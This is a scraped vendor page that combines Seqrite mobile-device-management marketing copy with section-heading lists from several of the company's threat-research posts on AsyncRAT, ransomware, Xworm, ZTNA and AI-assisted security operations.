- App Lock for Sensitive Apps: Adds an extra layer of protection by locking selected apps behind additional authentication, safeguarding sensitive data.
- Anti-theft: Remotely locate, lock, and wipe data on lost or stolen devices. Block or completely lock the device on SIM change.
- Web Security: Comprehensive browsing, phishing, and web protection. Blacklist/ whitelist the URLs or use category/keyword-based blocking. Also, restrict usage of YouTube to control non-work-related content consumption during work hours.
Seqrite MDM goes beyond the basics with advanced features designed to deliver greater control, flexibility, and efficiency for businesses. Its granular app management capability allows IT teams to control apps down to the version level, ensuring only compliant applications are installed across devices. With virtual fencing, policies can be applied based on Wi-Fi, geolocation, or time – making it especially valuable for shift-based teams or sensitive field operations. Real-time analytics provide deep visibility into device health, data usage, and compliance through intuitive dashboards and automated reports. Downtime is further minimized with remote troubleshooting, enabling IT admins to access and support devices instantly. Backed by Seqrite, a Quick Heal company, Seqrite MDM is proudly Made in India, Made for India – delivering modular pricing and unmatched local support tailored to diverse business needs. From BFSI to logistics, education to government services, Seqrite MDM is already powering secure mobility across sectors.

Ready to Take Control of Your Corporate Devices?

Empower your organization with secure, compliant, and efficient mobile operations. Discover how Seqrite Mobile Device Management can transform your mobility strategy:

Learn more about Seqrite MDM

Book a demo

References:

¹ https://www.verizon.com/business/resources/T834/reports/2024-mobile-security-index.pdf

² https://www.zscaler.com/resources/industry-reports/threatlabz-mobile-iot-ot-report.pdf

³ https://www.tribuneindia.com/news/india/138-increase-in-cyber-attacks-on-govt-bodies-in-four-years/
Source link
سپتامبر 10, 2025

دسته: هسته اصلی سیستم‌عامل

Content Overview

Introduction –

Initial Vector –

Infection Chain –

Analysis of .SVG Attachment –

Analysis of .HTA file –

Analysis of .VBS file –

Analysis of .ps1 file –

Analysis of Downloader-Loader –

Anti-VM Technique:

Persistence Technique:

Download and Loader Function:

AsyncRAT Payload-

File MD5’s –

Quick Heal \ Seqrite Detections –

MITRE Attack Tactics, Techniques, and Procedures (TTPs)

Authors –Prashil Moon, Kirti Kshatriya

Introduction

The Ransomware Kill Chain: A Step-by-Step Breakdown

Stage 1: Initial Access – Credential Compromise

Common Attack Pathways:

Stage 2: Remote Tool Abuse – Hijacking vs. Silent Installation

Method 1: Hijacking Existing Remote Access Tools

Method 2: Silent Installation of Remote Access Tools

Stage 3: Persistence & Privilege Consolidation

Mechanisms:

Stage 4: Antivirus Neutralization & Anti-Forensics

Techniques:

Stage 5: Payload Deployment & Execution

Mechanism:

Stage 6: Lateral Expansion

Mechanisms:

Indicators:

Stage 7: Impact – Encryption & Lockout

Outcome:

Real-World Campaign Examples

Threat Actor TTP Mapping (MITRE ATT&CK)

Emerging Trends & Future Threats

How Quick Heal / Seqrite Protect Against These Activities.

Security Best Practices & Recommendations

Conclusion:

Why the DPDP Rules Matter

Key Areas to Watch in the Final Rules

What Businesses Should Do Now

The Bigger Picture

The Cybersecurity Reality for Banks

Why VPNs Are No Longer Enough

The Rise of Zero Trust Network Access (ZTNA)

Seqrite ZTNA: Tailored for Banks

The Way Forward

Table of Content:

Introduction:

Infection Chain:

Process Tree:

Campaign 1:

Persistence:

BATCH files:

Loader

Xworm

Campaign 2:

Conclusion:

IOCS:

Detections:

MITRE ATTACK TTPs:

Introduction: A Security Crisis That Keeps Leaders Awake

Why Traditional SecOps is Falling Short

Alert Fatigue & Human Limits

Signature-Based Detection Can’t Keep Up

Longer Dwell Times = Bigger Damage

Ransomware at Machine Speed

How AI Bridges the Gap in SecOps

1. Anomaly-Based Threat Detection

2. Real-Time Threat Intelligence

3. Automated Alert Triage

4. Privilege Management & Insider Threats

5. Automated Threat Containment

6. Shadow IT Discovery

7. Phishing & Deepfake Defense

8. BYOD Endpoint Protection

Authors –
Prashil Moon, Kirti Kshatriya